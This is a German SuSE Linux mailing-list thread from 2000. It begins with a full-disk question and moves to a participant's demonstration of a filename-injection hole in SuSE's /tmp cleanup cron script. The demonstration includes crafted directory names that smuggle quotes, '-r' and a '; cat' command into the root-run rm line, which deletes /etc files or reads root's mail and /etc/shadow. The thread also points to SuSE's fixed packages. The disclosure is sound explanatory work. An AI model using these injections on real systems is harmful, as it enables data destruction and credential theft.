Hallo ! gestern hat sich meine Festplatte auf seltsame art gefuellt. mit einem mal waren 8Mb weg. Irgendeine Anwendung hat irgendwelchen Muell hinterlassen vermute ich. ( wahrscheinlich Java). Wie finde ich denn nun raus wo dieser Datenmuell liegt. Beziehungsweise gibt es irgendein programm zum reinigen der Festplatte? Besten Dank DerStrudel --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
* Christian Faubel schrieb am 14.Jun.2000:
gestern hat sich meine Festplatte auf seltsame art gefuellt. mit einem mal waren 8Mb weg. Irgendeine Anwendung hat irgendwelchen Muell hinterlassen vermute ich. ( wahrscheinlich Java). Wie finde ich denn nun raus wo dieser Datenmuell liegt. Beziehungsweise gibt es irgendein programm zum reinigen der Festplatte?
Wie meinst Du das? Woher soll ein solches Programm wissen, was weg darf und was nicht. Alte core-file und /tmp-Einträge macht schon der cron, wenn man ihm läßt. Kann man in rc.config eintragen. Du könntest mal mit find suchen, was gestern so alles auf Deiner Platte gekommen ist. find / -type f -mtime -2 -size +1024k ucht im ganzen Dateibaum nach normale Dateien die nicht älter als zwei Tage sind und größer als 1MB. Du kannst natürlich auch ein wenig an den Werten drehen. Siehe man find Bernd -- ROTFL = Rolling On The Floor, Laughing = Auf dem Boden wälzen, lachend. SCNR = Sorry, Could Not Resist = Sorry, Ich konte nicht wiederstehen. AFAIK = As Far As I Know = So weit ich weis|BTW = By The Way = Nebenbei bemerkt IMHO = In My Humble Opinion = meiner bescheidenen Meinung nach |Zufallssig. 9 --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
Bernd Brodesser schrieb in 1,3K (37 Zeilen):
Alte core-file und /tmp-Einträge macht schon der cron, wenn man ihm läßt. Kann man in rc.config eintragen.
Dir ist aber klar, dass das SuSE-/tmp-cleanup-Script eine heftige Sicherheitsluecke ist, wenn man nicht allen lokalen Usern trauen kann? -Wolfgang --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
* Wolfgang Weisselberg wrote on Wed, 28 Jun 2000:
Dir ist aber klar, dass das SuSE-/tmp-cleanup-Script eine heftige Sicherheitsluecke ist, wenn man nicht allen lokalen Usern trauen kann?
Kannst du das mal etwas detailierter ausfuehren? -Dirk --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
On Wed, 28 Jun 2000, Wolfgang Weisselberg wrote:
Bernd Brodesser schrieb in 1,3K (37 Zeilen):
Alte core-file und /tmp-Einträge macht schon der cron, wenn man ihm läßt. Kann man in rc.config eintragen.
Dir ist aber klar, dass das SuSE-/tmp-cleanup-Script eine heftige Sicherheitsluecke ist, wenn man nicht allen lokalen Usern trauen kann?
-Wolfgang
würdest du das mal bitte etwas genauer Erläutern ? Gruss Matthias --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
Matthias Dort schrieb in 0,4K (19 Zeilen):
On Wed, 28 Jun 2000, Wolfgang Weisselberg wrote:
Dir ist aber klar, dass das SuSE-/tmp-cleanup-Script eine heftige Sicherheitsluecke ist, wenn man nicht allen lokalen Usern trauen kann?
würdest du das mal bitte etwas genauer Erläutern ?
[Bitte vor der Panik das Ende der Mail abwarten] /tmp ist fuer alle lokalen User frei beschreibbar. Es ist trivial, beliebige Direktory-Strukturen zu generieren ... und beliebige Files. /etc/cron.daily/aaa_base_clean_tmp: [...] for TMP_DIR in $TMP_DIRS_TO_CLEAR ; do for DEL_FILE in `find $TMP_DIR/. $OMIT \( -type f -o -type l \) \ -atime +$MAX_DAYS_IN_TMP -printf "\"%p\"\n" \ | sort -r` ; do rm -f $DEL_FILE [...] Ok ... ich will /etc/passwd loeschen ... $ mkdir -p /tmp/xxx\"\ \"/etc $ touch /tmp/xxx\"\ \"/etc/passwd mal sehen: $ find /tmp/. \( -type f -o -type l \) \ -printf "\"%p\"\n" \ | sort -r | grep pass find: /tmp/./screens/S-root: Permission denied find: /tmp/./screens/S-test: Permission denied find: /tmp/./YaST.tdir: Permission denied "/tmp/./xxx" "/etc/passwd" ^^^^^^^^^^^^^ $ rm "/tmp/./xxx" "/etc/passwd" rm: cannot remove `/tmp/./xxx': No such file or directory rm: remove write-protected file `/etc/passwd'? y rm: cannot unlink `/etc/passwd': Permission denied $ rm -f "/tmp/./xxx" "/etc/passwd" rm: cannot unlink `/etc/passwd': Permission denied Aber root kann ... :-) und das Problem mit der atime: $ ls -la --time=access /tmp/xxx\"\ \"/etc/passwd -rw-r--r-- 1 weissel users 0 Jun 30 00:43 /tmp/xxx" "/etc/passwd $ touch -a --date="1 January 1970" /tmp/xxx\"\ \"/etc/passwd $ ls -la --time=access /tmp/xxx\"\ \"/etc/passwd -rw-r--r-- 1 weissel users 0 Jan 1 1970 /tmp/xxx" "/etc/passwd ... ist KEIN Problem mehr. Wie man einen Job mit at oder cron startet und dann das Executable loescht, sollte trivial sein. Also kann ein beliebiger lokaler User beliebige Files (Logfiles, Passwoerter, Datenbanken, Konfigurationen ... ) loeschen, sowohl von root als auch von anderen Usern. Noch schoener ist: $ mkdir -p /tmp/xxx\"\ \-r\ \" $ touch /tmp/xxx\"\ -r\ \"/etc $ find /tmp/. \( -type f -o -type l \) \ -printf "\"%p\"\n" \ | sort -r | grep pass "/tmp/./xxx" -r "/etc" $ rm -f "/tmp/./xxx" -r "/etc" rm: cannot unlink `/etc/fstab': Permission denied rm: cannot unlink `/etc/mtab': Permission denied rm: cannot unlink `/etc/passwd': Permission denied rm: cannot unlink `/etc/group': Permission denied rm: cannot unlink `/etc/DIR_COLORS': Permission denied rm: cannot unlink `/etc/motd': Permission denied rm: cannot unlink `/etc/permissions.local': Permission denied rm: cannot unlink `/etc/SuSE-release': Permission denied rm: cannot unlink `/etc/localtime': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base': Permission denied rm: cannot unlink `/etc/cron.daily/tetex': Permission denied rm: cannot unlink `/etc/cron.daily/wwwoffle-purge': Permission denied rm: cannot unlink `/etc/cron.daily/news': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base_backup_rpmdb': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base_clean_catman': Permission denied rm: cannot unlink `/etc/cron.daily/aaa_base_clean_core': Permission denied [...] Don't try that at home .. or as root ... Und jetzt wollen wir sehen, ob wir ein ";" untergebracht bekommen ... $ mkdir -p /tmp/xxx\"\ \;\ cat\ /var/spool/mail/root\ \"/etc/ $ touch /tmp/xxx\"\ \;\ cat\ /var/spool/mail/root\ \"/etc/shadow $ find /tmp/. \( -type f -o -type l \) \ -printf "\"%p\"\n" \ | sort -r | grep shad "/tmp/./xxx" ; cat /var/spool/mail/root "/etc/shadow" $ rm -f "/tmp/./xxx" ; cat /var/spool/mail/root "/etc/shadow" cat: /var/spool/mail/root: Permission denied cat: /etc/shadow: Permission denied $ su - # rm -f "/tmp/./xxx" ; cat /var/spool/mail/root "/etc/shadow" From root Wed Jun 28 11:30:00 2000 Return-Path: <root> Received: (from root@localhost) [...] dpbox:*:8902:0:10000:::: gdm:*:8902:0:10000:::: ingres:*:8902:0:10000:::: # exit Allerdings *hat* SuSE gefixte Pakete zum Downloaden, dort heisst der relevante Code: find $TMP_DIR/. $OMIT ! -type d \ -atime +$MAX_DAYS_IN_TMP -exec /usr/bin/safe-rm {} \; Dann kann man natuerlich immer noch ein Dir voller Schrott und mit *richtig* vielen Dirs machen, und wenn der Cronjob darin laeuft: mv /tmp/dir /tmp/dir2; ln -s / /tmp/dir Dagegen ist das find nicht sicher ... aber safe-rm cd'd dahin und tested, ob das reale "/etc" == "/tmp/dir/etc" ist ... was natuerlich nicht der Fall ist. Das "cd -P" in /usr/bin/safe-rm scheint allerdings mit oder ohne "-P" das gleiche zu bewirken. ftp://ftp.suse.com/pub/suse/i386/update/6.3/a1/aaa_base.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.4/a1/aaa_base.rpm (und ich nehme an, fuer 6.2 und earlier gilt es entsprechend). -Wolfgang PS: Ich brauche KEIN Cc:, ich lese diese Liste ... offensichtlich. --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
* Wolfgang Weisselberg schrieb am 30.Jun.2000:
Allerdings *hat* SuSE gefixte Pakete zum Downloaden, dort heisst der relevante Code: find $TMP_DIR/. $OMIT ! -type d \ -atime +$MAX_DAYS_IN_TMP -exec /usr/bin/safe-rm {} \;
Würde es nicht reiche, einfach die Variablen in "" zu setzen? Bernd -- LILO funktioniert nicht? Hast Du /etc/lilo.conf verändert und vergessen, lilo aufzurufen? Ist Deine /boot-Partition unter der 1024 Zylindergrenze? Bei anderen LILO Problemen mal in der SDB nachschauen: http://localhost/doc/sdb/de/html/rb_bootdisk.html |Zufallssignatur 6 --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
Bernd Brodesser schrieb in 0,8K (22 Zeilen):
* Wolfgang Weisselberg schrieb am 30.Jun.2000:
Allerdings *hat* SuSE gefixte Pakete zum Downloaden, dort heisst der relevante Code: find $TMP_DIR/. $OMIT ! -type d \ -atime +$MAX_DAYS_IN_TMP -exec /usr/bin/safe-rm {} \;
Würde es nicht reiche, einfach die Variablen in "" zu setzen?
Nein. Die Variable heisst ja -->schrott" "/etc/passwd<-- und aus rm "$VARIABLE" wird damit rm "schrott" "/etc/passwd" Hatte ich aber auch so geschrieben. -Wolfgang --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
So das Problem ist geloest. kurz ein paar worte was geschah: Java hat sich aufgehaengt, ich habe den X-server abgeschossen, und eine Datei im User verzeichnis: .X.err ist solange vollgeschrieben worden bis die root-Partition voll war. Gut finde ich das nicht. Vielen Dank fuer die Antworten die bei der Suche geholfen haben. Gruss DerStrudel Christian Faubel wrote:
Hallo !
gestern hat sich meine Festplatte auf seltsame art gefuellt. mit einem mal waren 8Mb weg. Irgendeine Anwendung hat irgendwelchen Muell hinterlassen vermute ich. ( wahrscheinlich Java). Wie finde ich denn nun raus wo dieser Datenmuell liegt. Beziehungsweise gibt es irgendein programm zum reinigen der Festplatte?
Besten Dank DerStrudel
--------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
--
/*************************************************************/
$B%U%!%&%Y%k!!%/%j%9!!;0MNEE5!(B $B%a%+%H%m%K%/%98&5f=j(B
$B!!!!!!!!!!!!#H#A%7%9%F%`8&5fIt!!%m%\%F%#%/%95;=Q%0%k!<%W(B
E-mail:chris@mech.rd.sanyo.co.jp
$B")(B570-8502 $BBg:eI\
* Christian Faubel schrieb am 15.Jun.2000:
So das Problem ist geloest. kurz ein paar worte was geschah: Java hat sich aufgehaengt, ich habe den X-server abgeschossen, und eine Datei im User verzeichnis: .X.err ist solange vollgeschrieben worden bis die root-Partition voll war. Gut finde ich das nicht.
Deshalb unter anderem, ist eine eigene /home-Partition von Vorteil. Eine vollgeschriebene /home-Partition ist zwar auch nicht schön, aber nicht gar so schlimm wie eine vollgeschriebene /-Partition. Bernd -- Bei Fragen an die Liste erst mal nachschauen, ob es diese Frage nicht schon einmal gegeben hat. Ein Archiv der Liste findest Du auf: http://lists.suse.com/archives/suse-linux |Zufallssignatur 7 --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
* On Thu, Jun 15, 2000 at 11:27:11AM +0900, Christian Faubel wrote:
So das Problem ist geloest. kurz ein paar worte was geschah: Java hat sich aufgehaengt,
......hab ich schon gehört,...java soll suizid gefährdet sein. Und tot? Eigentlich Schade,...aber....
ich habe den X-server abgeschossen,
Das ist Mord,...ich bin geschockt!
und eine Datei im User verzeichnis: .X.err ist solange vollgeschrieben worden bis die root-Partition voll war.
Also das wüprde mich jetzt aber auch zum erschießen anregen.... ICH bin hier root,...nicht Java. Naja ist eh tod was solls.
Gut finde ich das nicht.
ACK
Vielen Dank fuer die Antworten die bei der Suche geholfen haben. Gruss DerStrudel
...in dem man geraten kann wenn es mit dem punkt punkt punkt nicht klappt ;))
/*************************************************************/ $B%U%!%&%Y%k!!%/%j%9!!;0MNEE5!(B $B%a%+%H%m%K%/%98&5f=j(B $B!!!!!!!!!!!!#H#A%7%9%F%`8&5fIt!!%m%\%F%#%/%95;=Q%0%k!<%W(B E-mail:chris@mech.rd.sanyo.co.jp
$B")(B570-8502 $BBg:eI\
Cooooool, die sig. lass ich glatt stehen ;) Sollen wir das jetzt kompilieren oder ist das aus einem Donald Duck-Heft abgeschrieben? ;-) Gruß, Clemens -- sig_07 Kernel patchen mittels .gz-paches: [Info: man patch] $ gzip -cd patch.gz | patch -p0 Achte darauf das du KEINEN "SuSE-Kernel" mit einem "freien" patch patcht. Da braucht's ein SuSE-patch. --------------------------------------------------- --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
Clemens Wohld wrote:
* On Thu, Jun 15, 2000 at 11:27:11AM +0900, Christian Faubel wrote:
/*************************************************************/ $B%U%!%&%Y%k!!%/%j%9!!;0MNEE5!(B $B%a%+%H%m%K%/%98&5f=j(B $B!!!!!!!!!!!!#H#A%7%9%F%`8&5fIt!!%m%\%F%#%/%95;=Q%0%k!<%W(B E-mail:chris@mech.rd.sanyo.co.jp
$B")(B570-8502 $BBg:eI\
Cooooool, die sig. lass ich glatt stehen ;)
Sollen wir das jetzt kompilieren oder ist das aus einem Donald Duck-Heft abgeschrieben?
ROTFL!!!!!!!! JLT --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
Clemens Wohld schrieb:
/*************************************************************/ $B%U%!%&%Y%k!!%/%j%9!!;0MNEE5!(B $B%a%+%H%m%K%/%98&5f=j(B $B!!!!!!!!!!!!#H#A%7%9%F%`8&5fIt!!%m%\%F%#%/%95;=Q%0%k!<%W(B E-mail:chris@mech.rd.sanyo.co.jp
$B")(B570-8502 $BBg:eI\
Cooooool, die sig. lass ich glatt stehen ;)
Sollen wir das jetzt kompilieren oder ist das aus einem Donald Duck-Heft abgeschrieben?
Nun, ausgehend von der Tatsache, dass Chris für eine japanische Firma arbeitet und wohl in Japan sitzt, nehme ich mal ganz einfach an, dass das mit den richtigen Zeichensatzeinstellungen japanische Schriftzeichen ergibt. Das hättest Du aber auch erraten können, oder? :-)) -- Bye, \|/ Tobias @ @ +----------------oOO-(_)-OOo-----------+ | Tobias Abt | | email: tabt@gmx.de | +--------------------------------------+ --------------------------------------------------------------------- To unsubscribe, e-mail: suse-linux-unsubscribe@suse.com For additional commands, e-mail: suse-linux-help@suse.com
participants (8)
-
B.Brodesser@online-club.de
-
c.wohld@ndh.net
-
chris@mech.rd.sanyo.co.jp
-
dirk@pirschel.de
-
lxlist@inz2cl01.rzffm.db.de
-
tabt@gmx.de
-
tinoco@student.physik.uni-dortmund.de
-
weissel@netcologne.de